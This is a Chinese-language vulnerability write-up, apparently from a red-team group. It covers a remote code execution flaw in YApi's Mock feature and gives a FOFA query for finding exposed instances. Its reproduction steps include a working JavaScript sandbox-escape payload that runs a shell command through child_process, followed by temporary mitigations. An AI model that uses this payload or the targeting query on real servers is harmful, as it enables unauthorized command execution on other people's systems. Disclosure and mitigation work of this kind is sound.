YApi 高级 Mock 远程代码执行漏洞

天幕安全团队是由一帮主站红队的选手组成的，致力于帮助企业进行安全的威胁发现，漏洞预警。帮助在校大学生熟悉网络安全知识，增强网络安全意识。

研究方向：漏洞挖掘、CTF、红蓝对抗、授权渗透测试，木马分析等。

近日，网络上爆出 YApi 的远程代码执行 0day 漏洞 正被广泛利用。攻击者通过注册用户后，即可通过 Mock 功能远程执行任意代码。

漏洞描述

YAPI接口管理平台是国内某旅行网站的大前端技术中心开源项目，使用mock数据/脚本作为中间交互层，为前端后台开发与测试人员提供更优雅的接口管理服务，该系统被国内较多知名互联网企业所采用。

YApi 是高效、易用、功能强大的 api 管理平台。但因为大量用户使用 YAPI的默认配置并允许从外部网络访问 YApi服务，导致攻击者注册用户后，即可通过 Mock功能远程执行任意代码。

fofa语法

app="YApi"

漏洞复现

主页面长这样滴~

注册一个用户

新建一个项目

点击项目进来，新建一个接口

写入exp

const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("whoami").toString()

查看访问接口

网页攻击

修复建议

该漏洞暂无补丁。

临时修复建议：

1. 关闭YAPI用户注册功能，以阻断攻击者注册。

2. 利用请求白名单的方式限制 YAPI 相关端口。

3. 排查 YAPI 服务器是否存在恶意访问记录。

切勿非法用途，履行白帽职责。